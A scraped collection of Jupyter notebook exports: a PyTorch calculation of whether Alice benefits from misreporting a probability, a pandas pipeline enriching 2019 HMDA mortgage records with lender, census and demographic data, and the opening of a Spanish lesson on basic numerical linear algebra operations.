was = torch.zeros_like(qaps)
for i, qap in enumerate(qaps):
Q = torch.tensor([
[1-qap,qap],
[.7,.3]
])
was[i] = W(0,P,Q).item()
argmax_wa = was.argmax()
print('Optimal thing to tell Bob', qaps[argmax_wa].item())
print('Maximum W_a', was[argmax_wa].item())
import matplotlib.pyplot as plt
plt.plot(qaps[400:600],was[400:600])
plt.xlabel("q_a(1) - Alice commit")
plt.ylabel('W_a - Alice self-expected prize')
plt.title('How much Alice expects to win as function of what she tells Bob')
plt.axvline(x=qaps[argmax_wa], label='Optimal q ' + str(round(qaps[argmax_wa].item(),3)), c='Green') #label='Maximum ' + str(round(was[argmax_wa].item(),3)), c='Green')
plt.axvline(x=0.5, label='True p ' + str(0.5), c='Purple')
plt.legend()
```
# Future work
* What if Alice and Bob takes rounds? Will they converge to something, possibly converging to being honest?
|
github_jupyter
|
#collapse_hide
import torch
P = torch.tensor([
[.5,.5],
[.7,.3]
])
print('P:',P)
def Z(m,P):
return P[m] @ (P[m] / P.sum(dim=0))
#collapse_hide
print('Z_a : ', Z(0,P).item())
print('Z_b : ', Z(1,P).item())
def W(m,P,Q):
return P[m] @ (Q[m] / Q.sum(dim=0))
#collapse_hide
import torch
#qap = 0.99999
Q = torch.tensor([
[.51,.49],
[.7,.3]
])
print('Q:', Q)
print('W_a : ', W(0,P,Q).item())
print('W_b : ', W(1,P,Q).item())
print('Alice is better off lying:', (W(0,P,Q) > Z(0,P)).item())
#collapse_hide
qaps = torch.linspace(0,1,1000)
was = torch.zeros_like(qaps)
for i, qap in enumerate(qaps):
Q = torch.tensor([
[1-qap,qap],
[.7,.3]
])
was[i] = W(0,P,Q).item()
argmax_wa = was.argmax()
print('Optimal thing to tell Bob', qaps[argmax_wa].item())
print('Maximum W_a', was[argmax_wa].item())
import matplotlib.pyplot as plt
plt.plot(qaps[400:600],was[400:600])
plt.xlabel("q_a(1) - Alice commit")
plt.ylabel('W_a - Alice self-expected prize')
plt.title('How much Alice expects to win as function of what she tells Bob')
plt.axvline(x=qaps[argmax_wa], label='Optimal q ' + str(round(qaps[argmax_wa].item(),3)), c='Green') #label='Maximum ' + str(round(was[argmax_wa].item(),3)), c='Green')
plt.axvline(x=0.5, label='True p ' + str(0.5), c='Purple')
plt.legend()
| 0.431105 | 0.99032 |
```
%load_ext autoreload
%autoreload 2
import pandas as pd
import numpy as np
import sys
sys.path.append('../..')
from utils.categorize_data import (setup_dti_cat, categorize_cltv, categorize_property_value_ratio,
calculate_prop_zscore, categorize_age, categorize_sex,
categorize_underwriter, categorize_loan_term, categorize_lmi)
```
### 1. Import Cleaned Data
- Rows: 17,545,457
- Columns: 87
```
hmda19_df = pd.read_csv('../../data/hmda_lar/cleaned_data/1_hmda2019_210823.csv', dtype = str)
hmda19_df.info()
```
### 2. Join with Lender Info
```
lender_def = pd.read_csv('../../data/supplemental_hmda_data/cleaned/lender_definitions_em210513.csv',
dtype = str)
lender_def.info()
lender_def2 = lender_def[['lei', 'lar_count', 'assets', 'lender_def', 'con_apps']].copy()
lender_def2.head(1)
hmda19_df = pd.merge(hmda19_df, lender_def2, how = 'left', on = ['lei'])
```
Every record in HMDA data has a lender match. There are no missing values after the join.
```
hmda19_df['lar_count'].isnull().values.sum()
```
#### Lender Definition
Only 30,000 records, less than one percent, in overall HMDA data come from no definitions for lenders.
- 1: Banks
- 2: Credit Union
- 3: Independent Mortgage Companies
- 4: No definition
```
print(hmda19_df['lender_def'].value_counts(dropna = False, normalize = True) * 100)
```
### 3. Adding Metro Definitions
```
counties_df = pd.read_csv('../../data/census_data/county_to_metro_crosswalk/clean/all_counties_210804.csv',
dtype = str)
counties_df.info()
counties_df2 = counties_df[['fips_state_code', 'fips_county_code', 'metro_code', 'metro_type_def',
'metro_percentile']].copy()
counties_df2 = counties_df2.rename(columns = {'fips_state_code': 'state_fips',
'fips_county_code': 'county_fips'})
counties_df2.head(1)
```
#### Metro Percentile Definitions
Majority of applications come from metros in the 80th percentile or larger ones.
- 111: Micro
- 000: No Metro
- 99: 99th percentile
- 9: 90th percentile
```
hmda19_df = pd.merge(hmda19_df, counties_df2, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df['metro_percentile'].value_counts(dropna = False, normalize = True) * 100
```
### 4. Add Property Value by County
```
prop_values_df = pd.read_csv('../../data/census_data/property_values/' +
'ACSDT5Y2019.B25077_data_with_overlays_2021-06-23T115616.csv', dtype = str)
prop_values_df.info()
```
#### First pass at cleaning median property value data
```
prop_values_df2 = prop_values_df[(prop_values_df['GEO_ID'] != 'id')]
prop_values_df3 = prop_values_df2.rename(columns = {'B25077_001E': 'median_value',
'B25077_001M': 'median_value_moe'})
prop_values_df3['state_fips'] = prop_values_df3['GEO_ID'].str[9:11]
prop_values_df3['county_fips'] = prop_values_df3['GEO_ID'].str[11:]
prop_values_df4 = prop_values_df3[['state_fips', 'county_fips', 'median_value']].copy()
prop_values_df4.info()
```
#### Convert property value to numeric
- No property value for these two counties
```
prop_values_df4[(prop_values_df4['median_value'] == '-')]
prop_values_df4.loc[(prop_values_df4['median_value'] != '-'), 'median_prop_value'] = prop_values_df4['median_value']
prop_values_df4.loc[(prop_values_df4['median_value'] == '-'), 'median_prop_value'] = np.nan
prop_values_df4['median_prop_value'] = pd.to_numeric(prop_values_df4['median_prop_value'])
prop_values_df4[(prop_values_df4['median_prop_value'].isnull())]
hmda19_df = pd.merge(hmda19_df, prop_values_df4, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df.loc[(hmda19_df['property_value'] != 'Exempt'), 'prop_value'] = hmda19_df['property_value']
hmda19_df.loc[(hmda19_df['property_value'] == 'Exempt'), 'prop_value'] = np.nan
hmda19_df['prop_value'] = pd.to_numeric(hmda19_df['prop_value'])
```
### 5. Add Race and Ethnicity Demographic per Census Tract
```
race_df = pd.read_csv('../../data/census_data/racial_ethnic_demographics/clean/tract_race_pct2019_210204.csv',
dtype = str)
race_df.info()
race_df['white_pct'] = pd.to_numeric(race_df['white_pct'])
race_df['census_tract'] = race_df['state'] + race_df['county'] + race_df['tract']
race_df2 = race_df[['census_tract', 'total_estimate', 'white_pct', 'black_pct', 'native_pct', 'latino_pct',
'asian_pct', 'pacislander_pct', 'othercb_pct', 'asiancb_pct']].copy()
race_df2.sample(2, random_state = 303)
```
#### Create White Gradiant
```
race_df2.loc[(race_df2['white_pct'] > 75), 'diverse_def'] = '1'
race_df2.loc[(race_df2['white_pct'] <= 75) & (race_df2['white_pct'] > 50), 'diverse_def'] = '2'
race_df2.loc[(race_df2['white_pct'] <= 50) & (race_df2['white_pct'] > 25), 'diverse_def'] = '3'
race_df2.loc[(race_df2['white_pct'] <= 25), 'diverse_def'] = '4'
race_df2.loc[(race_df2['white_pct'].isnull()), 'diverse_def'] = '5'
race_df2['diverse_def'].value_counts(dropna = False)
```
- 0: No census data there
- NaN: Records that don't find a match in the census data
```
hmda19_df = pd.merge(hmda19_df, race_df2, how = 'left', on = ['census_tract'])
```
Convert the NaN to 0's
```
hmda19_df.loc[(hmda19_df['diverse_def'].isnull()), 'diverse_def'] = '0'
hmda19_df['diverse_def'].value_counts(dropna = False)
```
### 7. Clean Debt-to-Income Ratio
```
dti_df = pd.DataFrame(hmda19_df['debt_to_income_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'debt_to_income_ratio', 'debt_to_income_ratio': 'count'})
### Convert the nulls for cleaning purposes
dti_df = dti_df.fillna('null')
dti_df.head(2)
### Running function to organize debt-to-income ratio
dti_df['dti_cat'] = dti_df.apply(setup_dti_cat, axis = 1)
dti_df.head(2)
### Drop count column and replace the null values back to NaN
dti_df2 = dti_df.drop(columns = ['count'], axis = 1)
dti_df2 = dti_df2.replace('null', np.nan)
dti_df2.head(2)
```
A third of entire dataset is null, when it comes to DTI ratio.
```
hmda19_df = pd.merge(hmda19_df, dti_df2, how = 'left', on = ['debt_to_income_ratio'])
hmda19_df['dti_cat'].value_counts(dropna = False, normalize = True) * 100
```
### 8. Combine Loan-to-Value Ratio
```
cltv_df = pd.DataFrame(hmda19_df['combined_loan_to_value_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'combined_loan_to_value_ratio', 'combined_loan_to_value_ratio': 'count'})
### Convert cltv to numeric
cltv_df.loc[(cltv_df['combined_loan_to_value_ratio'] != 'Exempt'), 'cltv_ratio'] =\
cltv_df['combined_loan_to_value_ratio']
cltv_df['cltv_ratio'] = pd.to_numeric(cltv_df['cltv_ratio'])
```
#### Downpayment Flag
- 1: 20 percent or more downpayment
- 2: Less than 20 percent
- 3: Nulls
```
cltv_df['downpayment_flag'] = cltv_df.apply(categorize_cltv, axis = 1)
cltv_df2 = cltv_df.drop(columns = ['count', 'cltv_ratio'], axis = 1)
hmda19_df = pd.merge(hmda19_df, cltv_df2, how = 'left', on = ['combined_loan_to_value_ratio'])
hmda19_df['downpayment_flag'].value_counts(dropna = False)
```
### 9. Property Value Ratio Z-Score
Property value ratios are more normally distributed than raw property values. Because there's they are normally distributed below the 10th ratio, I will use the z-scores and place them into buckets based on those z-scores.
```
property_value_df = pd.DataFrame(hmda19_df.groupby(by = ['state_fips', 'county_fips', 'property_value',
'prop_value', 'median_prop_value'], dropna = False).size()).reset_index().\
rename(columns = {0: 'count'})
property_value_df['property_value_ratio'] = property_value_df['prop_value'].\
div(property_value_df['median_prop_value']).round(3)
property_value_df['prop_zscore'] = property_value_df.apply(calculate_prop_zscore, axis = 1).round(3)
property_value_df['prop_value_cat'] = property_value_df.apply(categorize_property_value_ratio, axis = 1)
property_value_df.sample(3, random_state = 303)
property_value_df2 = property_value_df[['state_fips', 'county_fips', 'property_value',
'median_prop_value', 'property_value_ratio', 'prop_zscore',
'prop_value_cat']].copy()
hmda19_df = pd.merge(hmda19_df, property_value_df2, how = 'left', on = ['state_fips', 'county_fips',
'property_value', 'median_prop_value'])
```
### 10. Applicant Age
- [9999](https://s3.amazonaws.com/cfpb-hmda-public/prod/help/2018-public-LAR-code-sheet.pdf): No Co-applicant
- 8888: Not Applicable
```
age_df = pd.DataFrame(hmda19_df['applicant_age'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_age', 'applicant_age': 'count'})
age_df['applicant_age_cat'] = age_df.apply(categorize_age, axis = 1)
age_df = age_df.drop(columns = ['count'], axis = 1)
```
#### Age Categories
- 1: Less than 25
- 2: 25 through 34
- 3: 35 through 44
- 4: 45 through 54
- 5: 55 through 64
- 6: 65 through 74
- 7: Greater than 74
- 8: Not Applicable
```
hmda19_df = pd.merge(hmda19_df, age_df, how = 'left', on = ['applicant_age'])
hmda19_df['applicant_age_cat'].value_counts(dropna = False)
```
### 11. Income and Loan Amount Log
```
hmda19_df['income'] = pd.to_numeric(hmda19_df['income'])
hmda19_df['loan_amount'] = pd.to_numeric(hmda19_df['loan_amount'])
hmda19_df['income_log'] = np.log(hmda19_df['income'])
hmda19_df['loan_log'] = np.log(hmda19_df['loan_amount'])
```
### 12. Applicant Sex
- 1: Male
- 2: Female
- 3: Information not provided
- 4: Not Applicable
- 5: No Co-Applicable
- 6: Marked Both
```
sex_df = pd.DataFrame(hmda19_df['applicant_sex'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_sex', 'applicant_sex': 'count'})
sex_df = sex_df.drop(columns = ['count'], axis = 1)
sex_df['applicant_sex_cat'] = sex_df.apply(categorize_sex, axis = 1)
```
#### New applicant sex categories
- 1: Male
- 2: Female
- 3: Not applicable
- 4: Makred both sexes
```
hmda19_df = pd.merge(hmda19_df, sex_df, how = 'left', on = ['applicant_sex'])
hmda19_df['applicant_sex_cat'].value_counts(dropna = False)
```
### 13. Automated Underwiting systems
- 1: Only one AUS was used
- 2: Same AUS was multiple times
- 3: Different AUS were used
- 4: Exempt
```
hmda19_df['aus_cat'].value_counts(dropna = False)
underwriter_df = pd.DataFrame(hmda19_df.groupby(by = ['aus_1', 'aus_cat']).size()).reset_index().\
rename(columns = {0: 'count'})
underwriter_df['main_aus'] = underwriter_df.apply(categorize_underwriter, axis = 1)
underwriter_df = underwriter_df.drop(columns = ['count'], axis = 1)
```
#### Main Aus
- 1: Desktop Underwriter
- 2: Loan Prospector
- 3: Technology Open to Approved Lenders
- 4: Guaranteed Underwriting System
- 5: Other
- 6: No main Aus
- 7: Not Applicable
```
hmda19_df = pd.merge(hmda19_df, underwriter_df, how = 'left', on = ['aus_1', 'aus_cat'])
hmda19_df['main_aus'].value_counts(dropna = False)
```
### 14. Loan Term
```
loanterm_df = pd.DataFrame(hmda19_df['loan_term'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'loan_term', 'loan_term': 'count'})
loanterm_df.loc[(loanterm_df['loan_term'] != 'Exempt'), 'em_loan_term'] = loanterm_df['loan_term']
loanterm_df['em_loan_term'] = pd.to_numeric(loanterm_df['em_loan_term'])
loanterm_df['mortgage_term'] = loanterm_df.apply(categorize_loan_term, axis = 1)
loanterm_df = loanterm_df.drop(columns = ['count', 'em_loan_term'])
```
#### Mortgage Term
- 1: 30 year mortgage
- 2: Less than 30 years
- 3: More than 30 years
- 4: Not applicable
```
hmda19_df = pd.merge(hmda19_df, loanterm_df, how = 'left', on = ['loan_term'])
hmda19_df['mortgage_term'].value_counts(dropna = False)
```
### 15. Tract MSA Income Percentage
```
tractmsa_income_df = pd.DataFrame(hmda19_df['tract_to_msa_income_percentage'].value_counts(dropna = False)).\
reset_index().rename(columns = {'index': 'tract_to_msa_income_percentage',
'tract_to_msa_income_percentage': 'count'})
tractmsa_income_df['tract_msa_ratio'] = pd.to_numeric(tractmsa_income_df['tract_to_msa_income_percentage'])
tractmsa_income_df['lmi_def'] = tractmsa_income_df.apply(categorize_lmi, axis = 1)
tractmsa_income_df = tractmsa_income_df.drop(columns = ['count', 'tract_msa_ratio'], axis = 1)
```
#### LMI Definition
- 1: Low
- 2: Moderate
- 3: Middle
- 4: Upper
- 5: None
```
hmda19_df = pd.merge(hmda19_df, tractmsa_income_df, how = 'left', on = ['tract_to_msa_income_percentage'])
hmda19_df['lmi_def'].value_counts(dropna = False)
```
### 16. Filter:
#### For Conventional and FHA loans that first-lien, one-to-four unit, site built unites for home purchase where the applicant is going to live in that property
```
one_to_four = ['1', '2', '3', '4']
hmda19_df2 = hmda19_df[((hmda19_df['loan_type'] == '1') | (hmda19_df['loan_type'] == '2'))\
& (hmda19_df['occupancy_type'] == '1') &\
(hmda19_df['total_units'].isin(one_to_four)) &\
(hmda19_df['loan_purpose'] == '1') &\
(hmda19_df['action_taken'] != '6') &\
(hmda19_df['construction_method'] == '1') &\
(hmda19_df['lien_status'] == '1') &\
(hmda19_df['business_or_commercial_purpose'] != '1')].copy()
print('hmda19_df: ' + str(len(hmda19_df)))
print('hmda19_df2: ' + str(len(hmda19_df2)))
```
### 17. Write new dataframe to CSV
```
hmda19_df2.info()
hmda19_df2.to_csv('../../data/hmda_lar/cleaned_data/2_hmda2019_210823.csv', index = False)
```
|
github_jupyter
|
%load_ext autoreload
%autoreload 2
import pandas as pd
import numpy as np
import sys
sys.path.append('../..')
from utils.categorize_data import (setup_dti_cat, categorize_cltv, categorize_property_value_ratio,
calculate_prop_zscore, categorize_age, categorize_sex,
categorize_underwriter, categorize_loan_term, categorize_lmi)
hmda19_df = pd.read_csv('../../data/hmda_lar/cleaned_data/1_hmda2019_210823.csv', dtype = str)
hmda19_df.info()
lender_def = pd.read_csv('../../data/supplemental_hmda_data/cleaned/lender_definitions_em210513.csv',
dtype = str)
lender_def.info()
lender_def2 = lender_def[['lei', 'lar_count', 'assets', 'lender_def', 'con_apps']].copy()
lender_def2.head(1)
hmda19_df = pd.merge(hmda19_df, lender_def2, how = 'left', on = ['lei'])
hmda19_df['lar_count'].isnull().values.sum()
print(hmda19_df['lender_def'].value_counts(dropna = False, normalize = True) * 100)
counties_df = pd.read_csv('../../data/census_data/county_to_metro_crosswalk/clean/all_counties_210804.csv',
dtype = str)
counties_df.info()
counties_df2 = counties_df[['fips_state_code', 'fips_county_code', 'metro_code', 'metro_type_def',
'metro_percentile']].copy()
counties_df2 = counties_df2.rename(columns = {'fips_state_code': 'state_fips',
'fips_county_code': 'county_fips'})
counties_df2.head(1)
hmda19_df = pd.merge(hmda19_df, counties_df2, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df['metro_percentile'].value_counts(dropna = False, normalize = True) * 100
prop_values_df = pd.read_csv('../../data/census_data/property_values/' +
'ACSDT5Y2019.B25077_data_with_overlays_2021-06-23T115616.csv', dtype = str)
prop_values_df.info()
prop_values_df2 = prop_values_df[(prop_values_df['GEO_ID'] != 'id')]
prop_values_df3 = prop_values_df2.rename(columns = {'B25077_001E': 'median_value',
'B25077_001M': 'median_value_moe'})
prop_values_df3['state_fips'] = prop_values_df3['GEO_ID'].str[9:11]
prop_values_df3['county_fips'] = prop_values_df3['GEO_ID'].str[11:]
prop_values_df4 = prop_values_df3[['state_fips', 'county_fips', 'median_value']].copy()
prop_values_df4.info()
prop_values_df4[(prop_values_df4['median_value'] == '-')]
prop_values_df4.loc[(prop_values_df4['median_value'] != '-'), 'median_prop_value'] = prop_values_df4['median_value']
prop_values_df4.loc[(prop_values_df4['median_value'] == '-'), 'median_prop_value'] = np.nan
prop_values_df4['median_prop_value'] = pd.to_numeric(prop_values_df4['median_prop_value'])
prop_values_df4[(prop_values_df4['median_prop_value'].isnull())]
hmda19_df = pd.merge(hmda19_df, prop_values_df4, how = 'left', on = ['state_fips', 'county_fips'])
hmda19_df.loc[(hmda19_df['property_value'] != 'Exempt'), 'prop_value'] = hmda19_df['property_value']
hmda19_df.loc[(hmda19_df['property_value'] == 'Exempt'), 'prop_value'] = np.nan
hmda19_df['prop_value'] = pd.to_numeric(hmda19_df['prop_value'])
race_df = pd.read_csv('../../data/census_data/racial_ethnic_demographics/clean/tract_race_pct2019_210204.csv',
dtype = str)
race_df.info()
race_df['white_pct'] = pd.to_numeric(race_df['white_pct'])
race_df['census_tract'] = race_df['state'] + race_df['county'] + race_df['tract']
race_df2 = race_df[['census_tract', 'total_estimate', 'white_pct', 'black_pct', 'native_pct', 'latino_pct',
'asian_pct', 'pacislander_pct', 'othercb_pct', 'asiancb_pct']].copy()
race_df2.sample(2, random_state = 303)
race_df2.loc[(race_df2['white_pct'] > 75), 'diverse_def'] = '1'
race_df2.loc[(race_df2['white_pct'] <= 75) & (race_df2['white_pct'] > 50), 'diverse_def'] = '2'
race_df2.loc[(race_df2['white_pct'] <= 50) & (race_df2['white_pct'] > 25), 'diverse_def'] = '3'
race_df2.loc[(race_df2['white_pct'] <= 25), 'diverse_def'] = '4'
race_df2.loc[(race_df2['white_pct'].isnull()), 'diverse_def'] = '5'
race_df2['diverse_def'].value_counts(dropna = False)
hmda19_df = pd.merge(hmda19_df, race_df2, how = 'left', on = ['census_tract'])
hmda19_df.loc[(hmda19_df['diverse_def'].isnull()), 'diverse_def'] = '0'
hmda19_df['diverse_def'].value_counts(dropna = False)
dti_df = pd.DataFrame(hmda19_df['debt_to_income_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'debt_to_income_ratio', 'debt_to_income_ratio': 'count'})
### Convert the nulls for cleaning purposes
dti_df = dti_df.fillna('null')
dti_df.head(2)
### Running function to organize debt-to-income ratio
dti_df['dti_cat'] = dti_df.apply(setup_dti_cat, axis = 1)
dti_df.head(2)
### Drop count column and replace the null values back to NaN
dti_df2 = dti_df.drop(columns = ['count'], axis = 1)
dti_df2 = dti_df2.replace('null', np.nan)
dti_df2.head(2)
hmda19_df = pd.merge(hmda19_df, dti_df2, how = 'left', on = ['debt_to_income_ratio'])
hmda19_df['dti_cat'].value_counts(dropna = False, normalize = True) * 100
cltv_df = pd.DataFrame(hmda19_df['combined_loan_to_value_ratio'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'combined_loan_to_value_ratio', 'combined_loan_to_value_ratio': 'count'})
### Convert cltv to numeric
cltv_df.loc[(cltv_df['combined_loan_to_value_ratio'] != 'Exempt'), 'cltv_ratio'] =\
cltv_df['combined_loan_to_value_ratio']
cltv_df['cltv_ratio'] = pd.to_numeric(cltv_df['cltv_ratio'])
cltv_df['downpayment_flag'] = cltv_df.apply(categorize_cltv, axis = 1)
cltv_df2 = cltv_df.drop(columns = ['count', 'cltv_ratio'], axis = 1)
hmda19_df = pd.merge(hmda19_df, cltv_df2, how = 'left', on = ['combined_loan_to_value_ratio'])
hmda19_df['downpayment_flag'].value_counts(dropna = False)
property_value_df = pd.DataFrame(hmda19_df.groupby(by = ['state_fips', 'county_fips', 'property_value',
'prop_value', 'median_prop_value'], dropna = False).size()).reset_index().\
rename(columns = {0: 'count'})
property_value_df['property_value_ratio'] = property_value_df['prop_value'].\
div(property_value_df['median_prop_value']).round(3)
property_value_df['prop_zscore'] = property_value_df.apply(calculate_prop_zscore, axis = 1).round(3)
property_value_df['prop_value_cat'] = property_value_df.apply(categorize_property_value_ratio, axis = 1)
property_value_df.sample(3, random_state = 303)
property_value_df2 = property_value_df[['state_fips', 'county_fips', 'property_value',
'median_prop_value', 'property_value_ratio', 'prop_zscore',
'prop_value_cat']].copy()
hmda19_df = pd.merge(hmda19_df, property_value_df2, how = 'left', on = ['state_fips', 'county_fips',
'property_value', 'median_prop_value'])
age_df = pd.DataFrame(hmda19_df['applicant_age'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_age', 'applicant_age': 'count'})
age_df['applicant_age_cat'] = age_df.apply(categorize_age, axis = 1)
age_df = age_df.drop(columns = ['count'], axis = 1)
hmda19_df = pd.merge(hmda19_df, age_df, how = 'left', on = ['applicant_age'])
hmda19_df['applicant_age_cat'].value_counts(dropna = False)
hmda19_df['income'] = pd.to_numeric(hmda19_df['income'])
hmda19_df['loan_amount'] = pd.to_numeric(hmda19_df['loan_amount'])
hmda19_df['income_log'] = np.log(hmda19_df['income'])
hmda19_df['loan_log'] = np.log(hmda19_df['loan_amount'])
sex_df = pd.DataFrame(hmda19_df['applicant_sex'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'applicant_sex', 'applicant_sex': 'count'})
sex_df = sex_df.drop(columns = ['count'], axis = 1)
sex_df['applicant_sex_cat'] = sex_df.apply(categorize_sex, axis = 1)
hmda19_df = pd.merge(hmda19_df, sex_df, how = 'left', on = ['applicant_sex'])
hmda19_df['applicant_sex_cat'].value_counts(dropna = False)
hmda19_df['aus_cat'].value_counts(dropna = False)
underwriter_df = pd.DataFrame(hmda19_df.groupby(by = ['aus_1', 'aus_cat']).size()).reset_index().\
rename(columns = {0: 'count'})
underwriter_df['main_aus'] = underwriter_df.apply(categorize_underwriter, axis = 1)
underwriter_df = underwriter_df.drop(columns = ['count'], axis = 1)
hmda19_df = pd.merge(hmda19_df, underwriter_df, how = 'left', on = ['aus_1', 'aus_cat'])
hmda19_df['main_aus'].value_counts(dropna = False)
loanterm_df = pd.DataFrame(hmda19_df['loan_term'].value_counts(dropna = False)).reset_index().\
rename(columns = {'index': 'loan_term', 'loan_term': 'count'})
loanterm_df.loc[(loanterm_df['loan_term'] != 'Exempt'), 'em_loan_term'] = loanterm_df['loan_term']
loanterm_df['em_loan_term'] = pd.to_numeric(loanterm_df['em_loan_term'])
loanterm_df['mortgage_term'] = loanterm_df.apply(categorize_loan_term, axis = 1)
loanterm_df = loanterm_df.drop(columns = ['count', 'em_loan_term'])
hmda19_df = pd.merge(hmda19_df, loanterm_df, how = 'left', on = ['loan_term'])
hmda19_df['mortgage_term'].value_counts(dropna = False)
tractmsa_income_df = pd.DataFrame(hmda19_df['tract_to_msa_income_percentage'].value_counts(dropna = False)).\
reset_index().rename(columns = {'index': 'tract_to_msa_income_percentage',
'tract_to_msa_income_percentage': 'count'})
tractmsa_income_df['tract_msa_ratio'] = pd.to_numeric(tractmsa_income_df['tract_to_msa_income_percentage'])
tractmsa_income_df['lmi_def'] = tractmsa_income_df.apply(categorize_lmi, axis = 1)
tractmsa_income_df = tractmsa_income_df.drop(columns = ['count', 'tract_msa_ratio'], axis = 1)
hmda19_df = pd.merge(hmda19_df, tractmsa_income_df, how = 'left', on = ['tract_to_msa_income_percentage'])
hmda19_df['lmi_def'].value_counts(dropna = False)
one_to_four = ['1', '2', '3', '4']
hmda19_df2 = hmda19_df[((hmda19_df['loan_type'] == '1') | (hmda19_df['loan_type'] == '2'))\
& (hmda19_df['occupancy_type'] == '1') &\
(hmda19_df['total_units'].isin(one_to_four)) &\
(hmda19_df['loan_purpose'] == '1') &\
(hmda19_df['action_taken'] != '6') &\
(hmda19_df['construction_method'] == '1') &\
(hmda19_df['lien_status'] == '1') &\
(hmda19_df['business_or_commercial_purpose'] != '1')].copy()
print('hmda19_df: ' + str(len(hmda19_df)))
print('hmda19_df2: ' + str(len(hmda19_df2)))
hmda19_df2.info()
hmda19_df2.to_csv('../../data/hmda_lar/cleaned_data/2_hmda2019_210823.csv', index = False)
| 0.235284 | 0.814164 |
(OTBALN)=
# 2.1 Operaciones y transformaciones bรกsicas del รlgebra Lineal Numรฉrica
```{admonition} Notas para contenedor de docker:
Comando de docker para ejecuciรณn de la nota de forma local:
nota: cambiar `<ruta a mi directorio>` por la ruta de directorio que se desea mapear a `/datos` dentro del contenedor de docker.
`docker run --rm -v <ruta a mi directorio>:/datos --name jupyterlab_optimizacion -p 8888:8888 -d palmoreck/jupyterlab_optimizacion:2.1.4`
password para jupyterlab: `qwerty`
Detener el contenedor de docker:
`docker stop jupyterlab_optimizacion`
Documentaciรณn de la imagen de docker `palmoreck/jupyterlab_optimizacion:2.1.4` en [liga](https://github.com/palmoreck/dockerfiles/tree/master/jupyterlab/optimizacion).
```
---
Nota generada a partir de [liga1](https://www.dropbox.com/s/fyqwiqasqaa3wlt/3.1.1.Multiplicacion_de_matrices_y_estructura_de_datos.pdf?dl=0), [liga2](https://www.dropbox.com/s/jwu8lu4r14pb7ut/3.2.1.Sistemas_de_ecuaciones_lineales_eliminacion_Gaussiana_y_factorizacion_LU.pdf?dl=0) y [liga3](https://www.dropbox.com/s/s4ch0ww1687pl76/3.2.2.Factorizaciones_matriciales_SVD_Cholesky_QR.pdf?dl=0).
```{admonition} Al final de esta nota el y la lectora:
:class: tip
* Entenderรก cรณmo utilizar transformaciones tรญpicas en el รกlgebra lineal numรฉrica en la que se basan muchos de los algoritmos del anรกlisis numรฉrico. En especรญfico aprenderรก cรณmo aplicar las transformaciones de Gauss, reflexiones de Householder y rotaciones Givens a vectores y matrices.
* Se familizarizarรก con la notaciรณn vectorial y matricial de las operaciones bรกsicas del รกlgebra lineal numรฉrica.
```
Las operaciones bรกsicas del รlgebra Lineal Numรฉrica podemos dividirlas en vectoriales y matriciales.
## Vectoriales
* **Transponer:** $\mathbb{R}^{n \times 1} \rightarrow \mathbb{R} ^{1 \times n}$: $y = x^T$ entonces $x = \left[ \begin{array}{c} x_1 \\ x_2 \\ \vdots \\ x_n \end{array} \right ]$ y se tiene: $y = x^T = [x_1, x_2, \dots, x_n].$
* **Suma:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x + y$ entonces $z_i = x_i + y_i$
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $y = \alpha x$ entonces $y_i = \alpha x_i$.
* **Producto interno estรกndar o producto punto:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}$: $c = x^Ty$ entonces $c = \displaystyle \sum_{i=1}^n x_i y_i$.
* **Multiplicaciรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x.*y$ entonces $z_i = x_i y_i$.
* **Divisiรณn *point wise:*** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^n$: $z = x./y$ entonces $z_i = x_i /y_i$ con $y_i \neq 0$.
* **Producto exterior o *outer product*:** $\mathbb{R}^n \times \mathbb{R} ^n \rightarrow \mathbb{R}^{n \times n}$: $A = xy^T$ entonces $A[i, :] = x_i y^T$ con $A[i,:]$ el $i$-รฉsimo renglรณn de $A$.
## Matriciales
* **Transponer:** $\mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{n \times m}$: $C = A^T$ entonces $c_{ij} = a_{ji}$.
* **Sumar:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A + B$ entonces $c_{ij} = a_{ij} + b_{ij}$.
* **Multiplicaciรณn por un escalar:** $\mathbb{R} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = \alpha A$ entonces $c_{ij} = \alpha a_{ij}$
* **Multiplicaciรณn por un vector:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{n} \rightarrow \mathbb{R}^{m}$: $y = Ax$ entonces $y_i = \displaystyle \sum_{j=1}^n a_{ij}x_j$.
* **Multiplicaciรณn entre matrices:** $\mathbb{R}^{m \times k} \times \mathbb{R}^{k \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = AB$ entonces $c_{ij} = \displaystyle \sum_{r=1}^k a_{ir}b_{rj}$.
* **Multiplicaciรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A.*B$ entonces $c_{ij} = a_{ij}b_{ij}$.
* **Divisiรณn *point wise*:** $\mathbb{R}^{m \times n} \times \mathbb{R}^{m \times n} \rightarrow \mathbb{R}^{m \times n}$: $C = A./B$ entonces $c_{ij} = a_{ij}/b_{ij}$ con $b_{ij} \neq 0$.
**Como ejemplos de transformaciones bรกsicas del รlgebra Lineal Numรฉrica se encuentran:**
(TGAUSS)=
## Transformaciones de Gauss
